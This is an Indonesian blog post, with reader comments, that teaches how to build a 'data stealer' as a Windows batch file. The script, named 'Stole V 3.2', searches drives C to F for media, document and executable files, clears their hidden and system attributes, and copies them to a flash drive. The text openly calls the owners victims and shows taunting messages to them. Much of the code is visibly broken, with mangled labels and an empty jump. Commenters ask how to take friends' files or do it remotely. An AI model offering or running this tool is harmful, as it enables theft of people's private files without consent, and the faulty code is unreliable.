Home » » Cara Membuat Program Pencuri Data Dengan Notepad

Cara Membuat Program Pencuri Data Dengan Notepad


Cara Membuat Program Pencuri Data Dengan Notepad


Cara Membuat Program Pencuri Data Dengan Notepad

Cara Membuat Program Pencuri Data Dengan Notepad program ini berfungsi untuk mencuri data seperti:
*.3gp
*.jpg
*.avi
*.wmv
*.rm
*.mpg
*.doc
*.xlsx

dan lainnya sudah tersedia dalam script berikut, caranya mudah banget :
1. Buka Notepad kalian melalui accessories atau melalui Run ketikan notepad.
2. Setelah kebuka notepadnya copy paste script berikut :
Sciptnya

echo off
color 0a
mode 31,15
if "%1"=="/?" goto Sej
if not "%n%" == "" set n=
:MetDtg
cls
title Stole V 3.2
msg * Digunakan untuk mencuri
msg * File atau data2 korban
echo.
echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ³ Program Aplikasi ³
echo ³ Stole V 3 .2 ³
echo ³ Author : sohai ³
echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
:awal
ption

echo ------EKSTENSI FILE----------

echo [1] 3gp [4] jpg [7] doc

echo [2] wmv [5] rm [8] xls

echo [3] avi [6] mpg [9] Exit

echo [10] exe

echo =============================

echo.

set/p "pil=Masukan Pilihan: "

if %pil%=='' goto option

if %pil%==1 goto 3gp

if %pil%==2 goto wmv

if %pil%==3 goto avi

if %pil%==4 goto jpg

if %pil%==5 goto rm

if %pil%==6 goto mpg

if %pil%==7 goto

if %pil%==8 goto m

if %pil%==9 goto keluar

if %pil%==10 goto exe

goto option
:3gp
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.3gp') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls
goto awal

goto option
:goto wmv
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.wmv') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)

cls
echo sudah tidak ditemukan file nyah
pause >nul


goto option
:avi
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.avi') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:jpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.jpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:rm
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.rm') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nulcls

goto option
:mpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.mpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:doc
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:xls
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:exe
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.exe') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls


:keluar
msg * data telah ter ambil!!!
msg * Hayoo !!! Dta kmu tuh apa ya???
msg * HEhehehehe
msg * by sohai
Exit




3. Kalau Sudah save filenya dengan ekstensi *bat dan Save As Type nya isi dengan All File
    contoh : Curidataorang.bat 
  


Cara Membuat Program Pencuri Data Dengan Notepad


DOWNLOAD NOW (MIRROR LINK)


Cara Membuat Program Pencuri Data Dengan Notepad

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Tips Trik Blog

107 comments:

  1. cara kerja program ini gna mint?

    ReplyDelete
    Replies
    1. Gampang cara kerjanya gan :
      1. Kan entar kalok sudah dibuka aplikasinya. Entar sobat disuruh milih menu option yang ada di aplikasi itu.
      2. Kalo sudah milih entar akan langsung otomatis di copy ke Flash Disk sobat.

      Nah segitu yng bsa ane jelasinnya terimakasih dah berkunjung dan berkomentar yha....

      Salam Blogger.....

      Delete
    2. berrarti kita harus copy program ini di fd gitu?

      Delete
  2. Replies
    1. kok gg bsa aku nyoba bsa....

      kan ada menu pilih entar pilih contoh
      agan mau pilih 3gp di menu pertama cukup ketik "1" (tanpa tanda kutip) lalu tekan enter..

      Delete
  3. Replies
    1. Inggih bli....

      matur suksma bli melali ke blog tiang'e bli...

      Delete
  4. cuma bisa bilang 1 kata.
    good.
    ditunggu komentbacknya..
    salam
    fauzanashariblog.blogspot.(com)

    ReplyDelete
  5. file2nya kok gak tercopy ya gan??? cuma folderny doang!!!! trus setelah milih misal 4 u/ exit tdak bsa ketik 9.

    ReplyDelete
  6. kl mau short by date misalnya (tanggal atau hari) mungkin lebih enteng kerjanya.. kl udah punya update share lg ya :)

    ReplyDelete
  7. Data syp tuh dicuri, emang kita yg nentuhin atau computer yg nentuhin??

    ReplyDelete
    Replies
    1. Tergantung kita,,,
      kan kta disuruh netuin format apa yang mau kita curi..

      Delete
  8. kenapa gak pake cara yang mudah aja tinggal copy terus paste deh di flasdisk

    ReplyDelete
    Replies
    1. bocah
      lebih cepet klo kita pake program
      lama klo nyari" trus copas

      Delete
  9. kalo file .exe gak bisa ya gan...?

    ReplyDelete
    Replies
    1. nah udah bsa sob...


      udah saya ganti script'a...

      Delete
  10. ini sifatnya mencuri atau membackup ke flasdisk ya gan?

    ReplyDelete
    Replies
    1. mencuri data sob sesuai format file yang sobat pilih....

      Delete
  11. gan ntuh software bisa curi data komputer laen secara ja
    rak jauh kgak

    ReplyDelete
  12. gan saya sudah jalankan saya pilih no .4 nah keluar jpg
    setelah proses muncul di desktop file laptop saya asus300 ..bla..bla..bla
    tolong pencerahannya gan, bagaimana cara menggunakannya dan apa akibat yang terjadi setelah saya melakukannya?

    terimakasih

    ReplyDelete
    Replies
    1. akibatnya gak ada sob...

      tu dah bka dlu programnya lalu pilih option 1 sd 10...

      Delete
  13. nice share bli..

    salam kenal,
    hanyagubukcatatan.blogspot.com

    ReplyDelete
  14. ini kalo disimpan dikomputer gimana gan? apa berpengaruh

    ReplyDelete
  15. kerja bagus gan,, codingnya ente bikin sendiri?

    ReplyDelete
  16. mantap saya mau nanya kalau ngambil punya orang itu gimana apa lansung kita ketik nama filenya /data yang ada di komputer orang terus kita enter apa gimana gen
    tolong jelasin gan...gini lebih jelasnya contohnya saya mau ngambil dokumen temen saya itu langsung kita buka program kita lansung ketik nama dokumen temen saya langsung entr apa gi mana gan

    ReplyDelete
    Replies
    1. kita pilih format pada option di program tersebut gan..

      Delete
  17. membuat bresenham ada ga kodingnya?...

    ReplyDelete
  18. Jarak jauh bisa,, tp harus lacak dulu "IPv4 victim",, yg pasti lewat jaringan internet,, perlu dirubah scriptx dikit...hm...

    ReplyDelete
    Replies
    1. pakek ftp -_- .. gw mahir kok ngambil data jarak jauh

      Delete
  19. mantap,,, tapi ko ane ga paham, banyak bacaan aneh,, tapi keren

    http://jajangbaberwahyudin.blogspot.com

    ReplyDelete
  20. itu programnya ditaruh di flashdisk???

    kunjungi blog ane softgart.blogspot.com

    ReplyDelete
  21. maksudnya program ini untuk mencuri data orang gan?

    ReplyDelete
  22. klo ambil data coreldraw, photoshop, autocad bisa ga gan...tks.

    ReplyDelete
  23. wah mantap gan smoga bisa bermanfaat.ane juga mw share aplikasi pembayaran angsuran bank pke php berbasis oop sama Yii bisa visit ke SINI salamkenal sob

    ReplyDelete
  24. ......weeeh bagus banget program noteped amu.....
    ...kunjungi balik dong,,,,prtengseng.blogspot

    ReplyDelete
  25. mantap gan, thanks.
    hack token top eleven ada ga gan???

    ReplyDelete
  26. mantep pisan gam mekasih sukses selalau buat agan dan kita semua AMIN

    ReplyDelete
  27. Penting banget ni gan,,, makasih banyak gan udah share ilmunya

    ReplyDelete
  28. Bisa Lewat Jaringan Lan gx nh Gan...??

    ReplyDelete
  29. gan maw nanya...cara nyimpan ke flas disk gimana..? harus d burning atau copy paste doang.....???

    ReplyDelete
  30. mantap gan,,,izin copas gan,,,,
    thank's smoga sama2 bermanfaat,,,

    ReplyDelete
  31. apanya yang dikopi filenya atau folderya

    ReplyDelete
  32. hy sob nie software bz d gunakan sengan jaringan gk????

    ReplyDelete
  33. saya sudah copi paste, lalu langkah slanjutnya gmn min?

    ReplyDelete
  34. naro hasil pembuatannya dimana gan..? di laptop teman kah atau di laptop sendiri

    ReplyDelete
  35. Lihat Hasil Curian Kita Dimana Gan..?

    ReplyDelete
    Replies
    1. di flashdisk tiba" muncul folder, namanya acak sesuai nama komputer, di dalam itu

      Delete
  36. keren gan programnya
    semoga bukan repost
    btw gw jg suka programing kyk gini
    gw nemuin bbrp bug, udh gw sempurna, trus gw tambah
    klo mao email gw aj

    ReplyDelete
  37. Kali di balikin gimana caranya??
    misal kita mau curi data yg di flashdisk di save ke PC kita

    ReplyDelete
  38. Thanks infonya sangat bermanfaat sob,semoga berguna bagi semua orang terutama bagi saya.
    Jika berkenan kunjungilah blog saya http://andom99.blogspot.com/
    dan follow me @ andri_gs99

    ReplyDelete
  39. masih gak ngerti gan ini buat apa.
    bedanya sama copas juga apa?

    ReplyDelete
  40. This comment has been removed by the author.

    ReplyDelete
  41. bro ada program lain ndak selain ini

    ReplyDelete
  42. www.berawal.net Postingan yang sangat bagus, saya setuju dengan Anda 100%!

    ReplyDelete
  43. www.mainbisnis.com saya terkesan, saya harus mengatakan ini kepada anda.

    ReplyDelete
  44. www.sukasuka.info Sangat jarang saya menemukan sebuah blog yang informatif dan menghibur seperti ini.

    ReplyDelete
  45. casino online melakukannya untuk tujuan SEO , tetapi untuk belajar hal-hal baru.

    ReplyDelete
  46. naga303.com Blog Anda sangat penting bagi semua orang, teruslah berbagi.

    ReplyDelete
  47. artiekl anda sgtlah bagus, tpi ini cara kerjanya gimana y?, textny udah sy simpan. tolong dijelaskan scr rinci. mohon kirim komenatrny lewat email saja. yusufrafif@gmail.com

    ReplyDelete
  48. itu ga tergantung sma kapasitas flash disk kan?

    ReplyDelete
  49. bang ni bhsa pemograman apa?
    jelas sin scrip nya bang buat proyek ke dosen
    " tolong bang admin"
    penjelasan nya bisa dikirim ke awikurniawan96@gmail.com

    ReplyDelete
  50. Work gan terimakasih buat scriptnya.. :D...

    <a href="https://www.estuwebdesign.com>Jasa Web Desain Murah</a>

    ReplyDelete
  51. Sungguh informasi yang sangat bagus, semoga tetap update terus min..
    terima kasih

    ReplyDelete
  52. Perkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
    Jika ya, silahkan kunjungi website ini www.kbagi.com untuk info selengkapnya.

    Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)

    ReplyDelete
  53. saya mau nanya kalo aplikasinya saya masukkin ke flashdisk,abis itu saya buka,bisa gak ngambil data dari pc trs dipindahkan ke flashdisk?
    terimakasih

    ReplyDelete
  54. saya mau nanya kalo aplikasinya saya masukkin ke flashdisk,abis itu saya buka,bisa gak ngambil data dari pc trs dipindahkan ke flashdisk?
    terimakasih

    ReplyDelete
  55. mas mohon solusi, punya saya sudah bisa tp kenapa datanya tersimpan ke data C/username bukan ke flashdisk

    ReplyDelete
  56. cara belajar buat code2 gitu gmana bos,
    bisa belajar gac

    ReplyDelete
  57. cara belajar buat code2 gitu gmana bos,
    bisa belajar gac

    ReplyDelete

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Tips Trik Blog™ - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger